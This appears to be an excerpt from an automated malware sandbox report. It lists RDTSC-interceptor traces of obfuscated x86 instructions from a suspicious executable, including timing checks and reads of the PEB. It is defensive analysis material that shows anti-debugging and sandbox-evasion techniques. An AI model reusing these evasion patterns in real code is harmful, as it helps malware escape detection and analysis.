Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1052651 second address: 105266D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAD0E3C64h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1052C5B second address: 1052C6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAACBBF1FAh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1052DB3 second address: 1052DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1052F57 second address: 1052F7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAACBBF207h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1052F7E second address: 1052F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAAD0E3C5Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1053109 second address: 105310D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 105310D second address: 1053113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1053113 second address: 1053119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1055FCA second address: 1055FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1059527 second address: 105952D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 105952D second address: 1059554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAAD0E3C62h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAAD0E3C5Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1059554 second address: 1059559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 735002D second address: 735003C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 735003C second address: 735006B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAACBBF1FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 735006B second address: 73500B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FAAAD0E3C5Dh 0x0000000b jmp 00007FAAAD0E3C5Bh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov ebp, esp 0x00000016 jmp 00007FAAAD0E3C66h 0x0000001b mov eax, dword ptr fs:[00000030h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73500B1 second address: 73500B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73500B7 second address: 73500FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007FAAAD0E3C60h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAAD0E3C67h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73500FC second address: 7350150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FAAACBBF207h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 jmp 00007FAAACBBF204h 0x00000018 mov edx, eax 0x0000001a popad 0x0000001b mov ebx, dword ptr [eax+10h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FAAACBBF203h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350150 second address: 7350177 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f movsx edx, ax 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350177 second address: 73501DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAAACBBF201h 0x00000008 pop eax 0x00000009 jmp 00007FAAACBBF201h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007FAAACBBF201h 0x00000017 xchg eax, esi 0x00000018 jmp 00007FAAACBBF1FEh 0x0000001d mov esi, dword ptr [770206ECh] 0x00000023 jmp 00007FAAACBBF200h 0x00000028 test esi, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73501DF second address: 73501E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73501E3 second address: 7350200 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350200 second address: 7350219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 mov ch, 21h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FAAAD0E4AB8h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx ecx, bx 0x00000016 mov ecx, edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350219 second address: 73502E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF202h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAAACBBF1FCh 0x00000012 adc al, 00000078h 0x00000015 jmp 00007FAAACBBF1FBh 0x0000001a popfd 0x0000001b movzx eax, bx 0x0000001e popad 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FAAACBBF1FDh 0x00000028 xchg eax, edi 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FAAACBBF1FCh 0x00000030 and cx, 2C08h 0x00000035 jmp 00007FAAACBBF1FBh 0x0000003a popfd 0x0000003b movzx esi, di 0x0000003e popad 0x0000003f call dword ptr [76FF0B60h] 0x00000045 mov eax, 7571E5E0h 0x0000004a ret 0x0000004b jmp 00007FAAACBBF1FBh 0x00000050 push 00000044h 0x00000052 jmp 00007FAAACBBF206h 0x00000057 pop edi 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b mov al, bl 0x0000005d pushfd 0x0000005e jmp 00007FAAACBBF206h 0x00000063 add esi, 6AF14BF8h 0x00000069 jmp 00007FAAACBBF1FBh 0x0000006e popfd 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73502E0 second address: 73502E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73502E7 second address: 735032C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 mov bx, cx 0x0000000c mov cl, 59h 0x0000000e popad 0x0000000f mov dword ptr [esp], edi 0x00000012 jmp 00007FAAACBBF201h 0x00000017 push dword ptr [eax] 0x00000019 pushad 0x0000001a mov esi, 0027A6A3h 0x0000001f call 00007FAAACBBF208h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 735032C second address: 7350359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr fs:[00000030h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAAAD0E3C5Dh 0x00000013 jmp 00007FAAAD0E3C5Bh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b mov ax, 5365h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350409 second address: 735042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FAAACBBF201h 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test esi, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edi 0x00000012 pop ecx 0x00000013 mov si, bx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 735042C second address: 7350445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 0CAD3EE9h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FAB1CD32EC5h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350445 second address: 7350449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350449 second address: 7350466 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350466 second address: 73504A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAACBBF207h 0x00000008 jmp 00007FAAACBBF208h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 sub eax, eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73504A3 second address: 73504A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73504A9 second address: 7350508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAACBBF1FBh 0x00000009 or eax, 21A0583Eh 0x0000000f jmp 00007FAAACBBF209h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FAAACBBF200h 0x0000001b adc eax, 488FCD38h 0x00000021 jmp 00007FAAACBBF1FBh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a mov dword ptr [esi], edi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 mov ecx, edi 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350508 second address: 735050E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 735050E second address: 73505B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAAACBBF1FEh 0x00000012 adc ch, FFFFFFC8h 0x00000015 jmp 00007FAAACBBF1FBh 0x0000001a popfd 0x0000001b mov dl, cl 0x0000001d popad 0x0000001e mov dword ptr [esi+08h], eax 0x00000021 pushad 0x00000022 push ebx 0x00000023 pushad 0x00000024 popad 0x00000025 pop eax 0x00000026 mov ebx, 5509850Eh 0x0000002b popad 0x0000002c mov dword ptr [esi+0Ch], eax 0x0000002f pushad 0x00000030 movsx edi, si 0x00000033 push ecx 0x00000034 pushad 0x00000035 popad 0x00000036 pop edi 0x00000037 popad 0x00000038 mov eax, dword ptr [ebx+4Ch] 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FAAACBBF202h 0x00000042 xor ecx, 42587B88h 0x00000048 jmp 00007FAAACBBF1FBh 0x0000004d popfd 0x0000004e call 00007FAAACBBF208h 0x00000053 push ecx 0x00000054 pop edx 0x00000055 pop esi 0x00000056 popad 0x00000057 mov dword ptr [esi+10h], eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FAAACBBF208h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73505B7 second address: 73505BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73505BE second address: 7350602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+50h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FAAACBBF204h 0x00000012 pushfd 0x00000013 jmp 00007FAAACBBF202h 0x00000018 sub ch, FFFFFFD8h 0x0000001b jmp 00007FAAACBBF1FBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350602 second address: 7350655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAD0E3C5Fh 0x00000009 add eax, 0343389Eh 0x0000000f jmp 00007FAAAD0E3C69h 0x00000014 popfd 0x00000015 mov ah, 84h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+14h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FAAAD0E3C66h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350655 second address: 73506B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FAAACBBF204h 0x00000013 add ecx, 278E1C28h 0x00000019 jmp 00007FAAACBBF1FBh 0x0000001e popfd 0x0000001f call 00007FAAACBBF208h 0x00000024 mov esi, 06579021h 0x00000029 pop esi 0x0000002a popad 0x0000002b mov dword ptr [esi+18h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73506B7 second address: 73506CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73506CD second address: 73506D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73506D3 second address: 73506D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73506D7 second address: 735070D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b jmp 00007FAAACBBF209h 0x00000010 mov dword ptr [esi+1Ch], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FAAACBBF1FDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 735070D second address: 735071D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAD0E3C5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 735071D second address: 7350721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350721 second address: 735078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+5Ch] 0x0000000b jmp 00007FAAAD0E3C67h 0x00000010 mov dword ptr [esi+20h], eax 0x00000013 jmp 00007FAAAD0E3C66h 0x00000018 mov eax, dword ptr [ebx+60h] 0x0000001b jmp 00007FAAAD0E3C60h 0x00000020 mov dword ptr [esi+24h], eax 0x00000023 pushad 0x00000024 mov cl, A1h 0x00000026 mov dh, 48h 0x00000028 popad 0x00000029 mov eax, dword ptr [ebx+64h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FAAAD0E3C5Ch 0x00000035 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 735078B second address: 735079A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 735079A second address: 73507A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73507A0 second address: 73507A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73507A4 second address: 73507C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+28h], eax 0x0000000e pushad 0x0000000f mov dh, ah 0x00000011 push eax 0x00000012 push edx 0x00000013 mov cx, di 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73507C0 second address: 735085E instructions: 0x00000000 rdtsc 0x00000002 mov edx, 3A6123BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [ebx+68h] 0x0000000d pushad 0x0000000e mov edi, esi 0x00000010 popad 0x00000011 mov dword ptr [esi+2Ch], eax 0x00000014 pushad 0x00000015 call 00007FAAACBBF206h 0x0000001a mov esi, 1C0ADA91h 0x0000001f pop ecx 0x00000020 popad 0x00000021 mov ax, word ptr [ebx+6Ch] 0x00000025 pushad 0x00000026 mov cl, CAh 0x00000028 push edi 0x00000029 push ecx 0x0000002a pop edi 0x0000002b pop eax 0x0000002c popad 0x0000002d mov word ptr [esi+30h], ax 0x00000031 pushad 0x00000032 mov bl, 44h 0x00000034 mov si, BBD7h 0x00000038 popad 0x00000039 mov ax, word ptr [ebx+00000088h] 0x00000040 jmp 00007FAAACBBF1FAh 0x00000045 mov word ptr [esi+32h], ax 0x00000049 pushad 0x0000004a pushfd 0x0000004b jmp 00007FAAACBBF1FEh 0x00000050 sub ax, 2178h 0x00000055 jmp 00007FAAACBBF1FBh 0x0000005a popfd 0x0000005b mov si, 60AFh 0x0000005f popad 0x00000060 mov eax, dword ptr [ebx+0000008Ch] 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FAAACBBF201h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 735085E second address: 7350892 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAAD0E3C68h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350892 second address: 7350898 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350898 second address: 735089E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 735089E second address: 73508A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73508A2 second address: 73508A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73508A6 second address: 7350924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b pushad 0x0000000c pushad 0x0000000d call 00007FAAACBBF200h 0x00000012 pop esi 0x00000013 pushfd 0x00000014 jmp 00007FAAACBBF1FBh 0x00000019 jmp 00007FAAACBBF203h 0x0000001e popfd 0x0000001f popad 0x00000020 push ecx 0x00000021 call 00007FAAACBBF1FFh 0x00000026 pop ecx 0x00000027 pop edi 0x00000028 popad 0x00000029 mov dword ptr [esi+38h], eax 0x0000002c pushad 0x0000002d movzx ecx, dx 0x00000030 popad 0x00000031 mov eax, dword ptr [ebx+1Ch] 0x00000034 jmp 00007FAAACBBF209h 0x00000039 mov dword ptr [esi+3Ch], eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f mov ah, 41h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350924 second address: 73509E3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAAAD0E3C5Fh 0x00000008 or cx, A97Eh 0x0000000d jmp 00007FAAAD0E3C69h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dx, cx 0x00000018 popad 0x00000019 mov eax, dword ptr [ebx+20h] 0x0000001c pushad 0x0000001d mov bh, al 0x0000001f pushfd 0x00000020 jmp 00007FAAAD0E3C65h 0x00000025 adc eax, 1A038E66h 0x0000002b jmp 00007FAAAD0E3C61h 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esi+40h], eax 0x00000035 jmp 00007FAAAD0E3C5Eh 0x0000003a lea eax, dword ptr [ebx+00000080h] 0x00000040 jmp 00007FAAAD0E3C60h 0x00000045 push 00000001h 0x00000047 pushad 0x00000048 mov dx, ax 0x0000004b pushad 0x0000004c mov di, cx 0x0000004f popad 0x00000050 popad 0x00000051 push esp 0x00000052 pushad 0x00000053 call 00007FAAAD0E3C5Ch 0x00000058 mov ax, 57F1h 0x0000005c pop eax 0x0000005d mov ax, dx 0x00000060 popad 0x00000061 mov dword ptr [esp], eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73509E3 second address: 73509E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 73509E9 second address: 7350A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350A03 second address: 7350A09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 7350A09 second address: 7350A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAD0E3C60h 0x00000008 mov ax, DDB1h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FAAAD0E3C5Ah 0x00000017 sbb esi, 16A9C788h 0x0000001d jmp 00007FAAAD0E3C5Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 mov cx, 8015h 0x00000029 rdtsc
